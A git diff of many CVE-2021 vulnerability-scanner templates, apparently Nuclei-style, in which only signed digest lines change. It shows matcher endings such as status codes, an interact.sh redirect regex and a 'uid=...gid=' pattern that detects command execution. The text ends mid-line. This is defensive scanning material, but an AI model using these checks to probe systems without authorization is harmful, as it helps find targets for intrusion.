b/http/cves/2021/CVE-2021-27132.yaml @@ -49,4 +49,4 @@ http: part: header status: - 404 -# digest: 4a0a004730450220798a67351234ac4915d6b8d807c8d6b28527b1adde716aa17d522551b303d57302210084005cf2f2878c8a191239115ef81f1446613a5f26ea0b47a2524a81d16d560b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043ac036b3571b4919fd761b16af9a4ca9c8914710720591144eecab64fc0c283022028b10ba3cdc505d50b65e5f49b06ac34553e6014c84e8054f5582d3a6b2617bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index 1006c66b980..487a6f86f19 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c58270067ccb78ec373a7e56bba6b95118b6ec135076a720adfe58eaf9b9cb2302205ffe1705eaa1aef0cf807ed21324df8f3b35b538bfe6a066e48800057e9ba794:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c27f53a99fc9e39d451f381172910e2494b2d041c4d96d91fef4a50dd84cf07802201047f34f73d9e47a94d7cddb0d17624ef96475635a0685e671d6137c8fa3ce19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml index a182723485b..43a95778989 100644 --- a/http/cves/2021/CVE-2021-27314.yaml +++ b/http/cves/2021/CVE-2021-27314.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 200' - 'contains(body, "Doctor Appoinment System")' condition: and -# digest: 4b0a004830460221009f0dd033bc1ebc270e8267ae0cb70236a91e352254b8d06d6031f9b1b94d28d002210089c5f647fda9b7916aa692ab02b87fcd90e4425487e999d1c9b4f67db5536052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a6692ec2fc910e4a95157b9ef3b335abd71ddd2fb982ff50b04e1f2b48186df0022100bdd8db2a92ea686b61b34fb12b74bb91d8a084d4f337a19708f71ad4adcd84c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index 7e3da29d0fb..e12b752f18e 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and -# digest: 4a0a00473045022100a3664540859f4ec5e86e64dc0515ab0a34bb3e887db48e4d130dd7d65fd4aade02205f5524629efd087d76078ccca39038eb429f9a66399eddae9b3f70df06c5e7ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009127a15763c18289c7c74fba9fd41391a956e35d31576fa3cc47bee5417ef76a02210081ca041cd06a24fb232ef32b19fb47c9695d134b52e3028180b2d318cb92e35d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml index 2216db4fc65..fa40e1c71c3 100644 --- a/http/cves/2021/CVE-2021-27316.yaml +++ b/http/cves/2021/CVE-2021-27316.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and -# digest: 4a0a00473045022100a9c290bc18904a8cbd016941d523c3444baaafd1b762eb9a3028e88c33a55df5022019ac4c88797c9a5999cd5b7b4ab70616bed46ba07b1e76b2377c859cc3b49bf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022045c4db486e7c5aebecbfa1ecd3cba55648ac6db274cebc74a8f960687ed9350202207c8eb257121e53499941818787b8e30ba97bc2a2b8d910070b283bac6f435f04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index cf6d0bd7636..d3ff70cf96c 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e48847c5979dcc5df4054a9aa6ec29505b78170e9f6b0db51fc4b4362776f28c02203589b891c7a51013dacd7c2b1aba3bfaf8d42ab4263eb433165baef22f068f5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203bb1cc07a68f9870a031eacb83abb2b257046f099858cd688a73eb9a6acb1d6d022100a3e13a6e52072d050cfd75f856213ae60cc7790d6224e4e20ae2d12f1acb7838:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index 04856982ba8..04bca16066a 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -59,4 +59,4 @@ http: part: header words: - "application/json" -# digest: 4a0a00473045022004ad53a1611a40b46a902158f6bd724abe605a8d64b4006052395b9d548d4c980221008c4cccaec12303495a310ce75856f1a73896cfb760bc24cf887d893f12db5b94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203d3a5383ae436f281eb4840cf89b020790c964510e77af83d1d70a28e2dd2ade0220781034389e8201bde28e9c1a763be093b87c4830309c819a3a9e55068b139339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index 30400874ec8..72702208815 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220428a4d94fa2bb6f5831d287d2b659f69aa8dfc15d00b8b27a2478a7011771573022100a3cde2e54ec18ae178b0d777faae29b0bee9b635f0839162e407001dca9e53ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e3d0bc8cbc176c449592c2e095f681d0164c60634cbb7913d7c9e1afd6f61a92022027b9bc63576198fe6c2af7affc3256be28cd22c57327a758b2ff591955371c1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27858.yaml b/http/cves/2021/CVE-2021-27858.yaml index 646f6b93559..4d162b8a9af 100644 --- a/http/cves/2021/CVE-2021-27858.yaml +++ b/http/cves/2021/CVE-2021-27858.yaml @@ -56,4 +56,4 @@ http: part: body regex: - 'version: "([0-9.a-z]+)"' -# digest: 4a0a004730450220332dad2a50968665cc4e453ad56d2081b60ecd355e04103fd9702e8253750fd6022100b96753046247a5bd0be42689af0cd80b5a2a5997c8ad20e344c65658a4144ebc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220598e4dd65ff47404ce3ec4e41b21d29b5e593cecca277cb8e78f63cdd785f980022035e28129943c4bf3671114df2440402884e10dc4203336e964b10acda495ccde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index 757b5dfb157..ad37d7838eb 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206eb77b6c3d297ae24bf67db9e4ba6924f7c7fcdd5df00cc6bd2a5a8a8acd3dcc0220130ab65bb7a2d43ecd09aab5e74cf5e22535ba6ba8d3ea18c9d2fee268ffd5b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023ed5e55df32ba870e42621a61f66fc77c3b07946b5a09d56716a85258f877b202205899bebb3b6f000e06b48f8f4b8769686ce59a18bd70146228ea01f4dbaa3fc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index d839697851e..19fa1a1082d 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -48,4 +48,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a00463044022050d8afe7c7189c70e5ab4c32919d1222f5061d3f961882fb1dd05ca325ee9f5802202d1bd2a2820d9f5036647b13ffac82d73807e122d99b2339c3a5deeeeea02144:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e3d5b6dc46a984529f81036bb7d7e9f92acc81b221dfd96bc93f2578dd8e32210220291df9f21e8bb97e5977263be9ec90a4d2fafdcdef73b86bd033fe49d0441d41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27964.yaml b/http/cves/2021/CVE-2021-27964.yaml index 06f1e46636a..8583fe0eb7b 100644 --- a/http/cves/2021/CVE-2021-27964.yaml +++ b/http/cves/2021/CVE-2021-27964.yaml @@ -70,4 +70,4 @@ http: - status_code == 200 - contains(body, '{{rand}}') condition: and -# digest: 4b0a00483046022100fc0aa33e11b5851c94ce77a458ccfb3bd2625849900dc3a05f860278c85552a0022100be58ecf852a8704c16f06aa2694a386341c66dedf19d1fd5e2f58d0ecf3c267f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a03b7b751e3be5bc7517220b33b79f6309bf183b35fccdb4846f46228c87a080022014cf6fbc09ec7c8ca4b3d931cc8a500908e83c7aafbdba4c20554eb9603198d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml index f63d445afdf..341e5cae1e9 100644 --- a/http/cves/2021/CVE-2021-28149.yaml +++ b/http/cves/2021/CVE-2021-28149.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bdb6815373be20f69bcb767fdd76ceacbf3eedb707d14d1d55fbb436ed5770580221008e4d18415b4dc91510ce2d27b60728d906ce7488561ae7ef78992fb8186777a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4c79930ec734ecbad687d50ce57354c96b53165c9b2444dcc38ae5c07412cb002201568cf7993e61d35489dd5e045fbaf4773956c70cf04eb77df6f88443b7794fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index 28405f820e3..df112887021 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204af710df01300d0146c072bf6dfdd598e79a8890791f10d7d2941fbc3556f15a022056c795ef1d6bd4b7e2b21f9490d2bd57fac69b46ac2c3c81b87229fb4c752148:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a070c4e7d3e62c22e8757bf84b93b95345a9aa54616370507b27bae1def4c45c02201587e6a0573ad04eb16103da8e0864d481974ef1237eb6d18df9e4852e7d08c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index 888707a8281..69fd80901e7 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022010dbb265c36f307ffb748b3bf6a4d3ed635e9151600b86a30299f00362710d1e02210083b9b85e8a690c3d66a3c81a9af6f7524cd76a87aa8beefab21749ddb20d2a11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d4c0dca4ec1293c8d0874de7e1263f20e6e04972a885dd37a3529af57929de09022100c786bb66d1eedee15ab51efb0b8e7a3adaeff8351aee9b33d6765dbb41de5e85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index 13ac451b5a9..f236d831785 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022031d445d0c4bf30a48edc855c102749917891c4ad0d7efbfe2e223e4f1201caf40220258e134344d3949ae61a6058c05c304ac523ea59fea988db68dd06509bde7591:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022028c936c8257867461e7f414ca49d48c2b0c801236cb5e35ea5039027c77be70c02203f830162543b467e29cd7637dc5178c9f20ee76ea57aa26c0827840917abc71b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28799.yaml b/http/cves/2021/CVE-2021-28799.yaml index bcede43c495..55b40e37ee3 100644 --- a/http/cves/2021/CVE-2021-28799.yaml +++ b/http/cves/2021/CVE-2021-28799.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022057bc81d3b616b07b8c92603609296d2588c253f53a056ec7fa2ad046a4ccffb9022100bfd22b4b3095d1baae0508ff686ff7fdb1198c2c3c79cf5a7dc2c4cf3e11ea1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a3be9b98a19bb9eedb86d95e21aff2a68caa60bb7aa6a39d131cc5ecb13aa71022100f7801fcbe370951b3240c03d781cbb375adb85fde3cba83edb2b4f18fa700b1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index b58d4530573..6435f2eedd9 100644 --- a/http/cves/2021/CVE-2021-28937.yaml +++ b/http/cves/2021/CVE-2021-28937.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c1cf75af7f680e98736539fc3f5f35162418b3f06d469ffe4688198cf6ecaa38022048f360e2f0678499c28bb713aed0eaf0270d661a0532ab03978cc9ad640aa274:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022073d3c5dfb03311e58cb63dcee2766de47488995712362b62caaa6ed045ee061302207198f68830b5161872eebe850af471ca7c1dc0ba45b5c1b94baaeb02ea258505:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml index aa2bc0a58a2..cf42d413206 100644 --- a/http/cves/2021/CVE-2021-29006.yaml +++ b/http/cves/2021/CVE-2021-29006.yaml @@ -65,4 +65,4 @@ http: part: header_3 status: - 200 -# digest: 4a0a0047304502201b561c18a345967cf3cf87713ac0a08dbee44df8c1e0f0f9fa49ad3bbfd8df74022100c2dfe7fab550faaac24c897943a2cb895be0e735b74759a686cc68c20e192375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205167ff4a3a9a78e23580acf55f94bfb9b13bf99bebaacc676bd2a4d4c6903385022100dd33b6763404da86ec4695bd2616d70a484a21d40fee5bf5097505cbf0ffeef2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index 38de35eb094..b4e04c1ad6f 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 201 -# digest: 490a00463044022031eb162a078e7017285d9a0eb51deb4912c023e82bc0eb0c02302388a4dc07db022004f30b5d4cb3a9aba3575f5305032b20d0730c508f645a4c4196a9d96935d7c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c5291e469ba992da52a73c0df0e6f8ccfcb8b03761e87d98e8bf0974f5da592702206e38ada1e964a63ef37fa95724b56ebf9a2a72d3fa8ac763111bd378bcb1564c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml index 49d591bb463..9ff3570ae7b 100644 --- a/http/cves/2021/CVE-2021-29441.yaml +++ b/http/cves/2021/CVE-2021-29441.yaml @@ -66,4 +66,4 @@ http: part: header words: - "application/json" -# digest: 4b0a004830460221009c8922707981b3e76e284ce38f0536774f5a88be0d2b8f0760dcd1f1fbfd80db022100f85cf2a62d0645aec903a6ff3addd0cb33bb736f82f1ff47c0da96d64b1a9d7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202277099fb214edf8cf2d8de5dfe11bae9a1a797934fea458fdfbf0d357303721022100aac2a2ad48d43744b8d649ba5595d5897f0c8a129d66dc5081a48f98c4178bd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml index 19dcd0dd42e..3773c2c6895 100644 --- a/http/cves/2021/CVE-2021-29442.yaml +++ b/http/cves/2021/CVE-2021-29442.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203defa01e68c64ec05f50fe76daf8b4f41a7c97e2acff616038ca67a7c105adc402203471d81dc5f94c14923658b1f087e03c9e4b3e9f39ff9b358490f32789810697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e1e8835737965dfd1c528af703dc4741190dfbd51c10ace4f9590604b5fb5b5e02204e440208d31fec56a6d8a08b10fafd412755b57db98156457b1b5cc57a53fa2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index e74d444499d..7e822496ca1 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009815ea02f08dc96a10fa094900fd874d62a8872fce4105f706d25a52f898e72f022100d81dd3c53ee5e1ff33f1811ba90eaf99b16a49c5a8846021f53d78a34ea1eca6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022012dfb79e298182c4d79711bd1a1db9d55aa77cb6f634fa026f88de40e65be04502203cf1fce8f5cc547d4e21e634524a4ef28a069852a0fd78c6dc983a453509d616:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29505.yaml b/http/cves/2021/CVE-2021-29505.yaml index 9336f2559cb..545a85eb761 100644 --- a/http/cves/2021/CVE-2021-29505.yaml +++ b/http/cves/2021/CVE-2021-29505.yaml @@ -114,4 +114,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450220755ec379e79c40788b9778f19e4a34bd4c16f3f34b3e7c5b8c4ca6c66effd355022100da74b175a81cdee37c4fd29e11617e4b470485fbb342341b1aee2aa539773cf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd5f4d304a49fc80ceff83bea032d59026f6a30228a21e9839b134f83e9fe894022100dafa620826f5027ff20885960cf3e615eed06780bc46d1ed2375203c91993e2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index adfda016b94..a42d611f744 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a00463044022071b0adf08a9beb1f2563ce2ec5a9f4c84733999a69585f8bfe1ba9d3eb0d4b4a02201f133da36ded1238395512f9bb953437765f84583504c0a186df73ee98893950:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008ebdb0974291f6b15fdbcab3053b0d47673dabe3355f7df92dc28bd3231dee4d0221008f34e2f98fb056ccbb46eb878ca9d81899733d0e80f80d077f0fc5737135d07e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index 28fc6baa543..5d21ed7c902 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dc155ac0196e2021e08c43ed94733b2e9aa777fff50181fd0789859816ffcd24022100cb8c798484123fd4d8d4f3c70c337261bb7e7da40308e2b06232cfa0743247a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100be13b6b395743433591d7378ec5326e34cdb4dc5a1a4f08e1ed61de72223150102201a20dda16a3d3ebed05b33b6cabb7509e55ad6e91f10ae23b8be7d44df668b7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index e8b7a81abcb..d5ae7e48262 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022033afd749729c28e705d3711095b6a4cb887ae8541bc4f97c551102f94df5cbb3022100bc8f848ee6cd19b8d399ee8b415b642604121da9fd9c4b359d930cd87e1e6029:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100847a756c98636e3435d1fa5303e7f1b348d4bdedcd6bd4acee6440b7dea4070b022100f083f88fe99b11914b09dffe81665ab7331f90cc9545e030e570fca116f02170:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3007.yaml b/http/cves/2021/CVE-2021-3007.yaml index e893575d2fb..57ab6323671 100644 --- a/http/cves/2021/CVE-2021-3007.yaml +++ b/http/cves/2021/CVE-2021-3007.yaml @@ -73,4 +73,4 @@ http: - 'contains_all(body, "zend", "{{rand}}")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022029be6671efd2910f7f8005b31c785f1a438a4b0c5a970220a0f2753557393407022100c3894dcc201fc0d1e955c81ec68aa5a6284e2377500a701f9753c2fef53fe4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a85194fca33e53733a58986d3aba4c0deb9e7c74463aa40b810c9e352b8370e02203a171082046d8ef994c935103d009a61dce3d1aaa7fca26eeaba4f7e6364d00a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30116.yaml b/http/cves/2021/CVE-2021-30116.yaml index 81b23d3fa86..1a2a6a6c84e 100644 --- a/http/cves/2021/CVE-2021-30116.yaml +++ b/http/cves/2021/CVE-2021-30116.yaml @@ -73,4 +73,4 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022054d20d34b60dbd9d3f2b6a0c79956c94ac77fd859f3479f18bcff1d4de8f692d022100b6a8653095a12babfe8e6db5ba6c9befb5fd2ff1c779cb88baa0acbd08dc3b6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c59bf4a84d0127d3dd7edfd8857db2aec55806b8bf46bc16891c9e50a2a1640f02202aa22473ba9ab6f526f47e63ebe0cf02c1456ef5e01ace368f22cabcc71d7780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30118.yaml b/http/cves/2021/CVE-2021-30118.yaml index bfaa4582850..fe13ee136f0 100644 --- a/http/cves/2021/CVE-2021-30118.yaml +++ b/http/cves/2021/CVE-2021-30118.yaml @@ -88,4 +88,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207e20f9ff484015f9f3ebe900dad8d3170a5c83970b8a9b3720e9806525510142022100c386f5e113578d85239dee60d57d019209c167832f107f6a594899b13ab68978:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022035c0627121d5e67b4c1e425bd70888624bebbad96b41058a3c01b794f0cc9d0702210081d9628252c91cfded904776cedd89b9a37458b22679c540c797a338b1a609db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index 61afedd71d4..d33664acf17 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d8d15c573622a5bc4c26fc6a42e7c39e1081c4b964c47b3b35e0785d356e7dc8022100a30541f6b153ddffae39818c6fcc95f4d78bbb8db892007b350e8f8b9b4debbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022028f57771295acc8ef72971ea62859df2b6d89236af32a5478e28a0edbaee6c27022073eaa3fc72b3787293f477de68c0b58fd44a9805caa7a86faf31b4f524730f5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index 2ff529d7e02..70217d2a7b0 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -77,4 +77,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100852235addebda9b9998984aff6ec946969ad354aa383aa254be42aad89b1d271022040e16d4c8f906cc3f5ac1a8805334ba5d485bb6d44bbf08a5a44a8e27ebff620:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b10480575b938382dd2dabeb0353a8239f2ef69338e4ce50554768eb7ec5fb2f022100c442e671aa15de0fee57b80dcba117c98b15f6f026fec4d91fd17920c42856b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index 61caf59dda8..2ff028f484e 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220708ba019d2c7328e9a3aec05c6f02ff9d8ea01afa2743e03bb34f3bb8ac7bcaf022100a6f1cb10d48e99a5618e16b077bb8910352a9afde12e362923fe1313a6de6046:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220693cafbe9137b329f0698d7cb324ea51933887e677705a28fd844b33eb29eeda022100995da4b7727a235456d19a64c281faacf6a9dc7af5367307937c4285839decf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30203.yaml b/http/cves/2021/CVE-2021-30203.yaml index b93cb4c889b..176e35e8e5f 100644 --- a/http/cves/2021/CVE-2021-30203.yaml +++ b/http/cves/2021/CVE-2021-30203.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a425a2ae9ae544a9ea6b7e9a28a34250ccc4ed7059413f8c3377345af5cb605402205113d00a60078482980b0a7143ff752614d708a63998c5f4f01a289e7c608ccd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210084f09751c3b305d8b83ec3e3745d99f1da779bccfed43f59c98860a14a07111c02201c52b6fe1fca6136901982288b5ae8012fa6b9008ce2079e93058ae8656ce981:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml index 115536891d2..3bb9f13ca22 100644 --- a/http/cves/2021/CVE-2021-30497.yaml +++ b/http/cves/2021/CVE-2021-30497.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205c9475a59e3d5d4003a4c8dff6d6446ae989826eb3ddc50114720de07217fa7f0221008f1fb1326d9b4ba65038f77b206af7291600142acaa7dd9eb645fcebcdb73333:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc2c397266b93b010a3fbe5d19f231688bce5ebb9c605abc3502d5510d6de323022100897bed0c63b8007ad5b6bccc7a41cf03bd2004ee04cc8798bc0e3998f4f99b34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31316.yaml b/http/cves/2021/CVE-2021-31316.yaml index 8f51219809d..f873a64a0ae 100644 --- a/http/cves/2021/CVE-2021-31316.yaml +++ b/http/cves/2021/CVE-2021-31316.yaml @@ -57,4 +57,4 @@ http: - 'status_code == 200' - 'contains(response, "Control WebPanel")' condition: and -# digest: 4b0a00483046022100ad5e1afadb44c2e0cdb2bcdacb3da2ddebc7bda8fde454a4cf88e7fc728c9d340221009d6f5f2216139688916835814df4030cc1666fdb66bbed1b4ec27a36e1b13ee4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed5a32ba01a7303ed23ff3c4899a9eb56abb170e2bd6914b5a42edd5c64e818e022034a264f1b9a6403a7588f184b4ccdfc3a3813b97ddbb8c54e8d5e10386853a4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31324.yaml b/http/cves/2021/CVE-2021-31324.yaml index a7200381126..666499336bb 100644 --- a/http/cves/2021/CVE-2021-31324.yaml +++ b/http/cves/2021/CVE-2021-31324.yaml @@ -55,4 +55,4 @@ http: part: body regex: - "uid=[0-9]+.*gid=[0-9]+.*" -# digest: 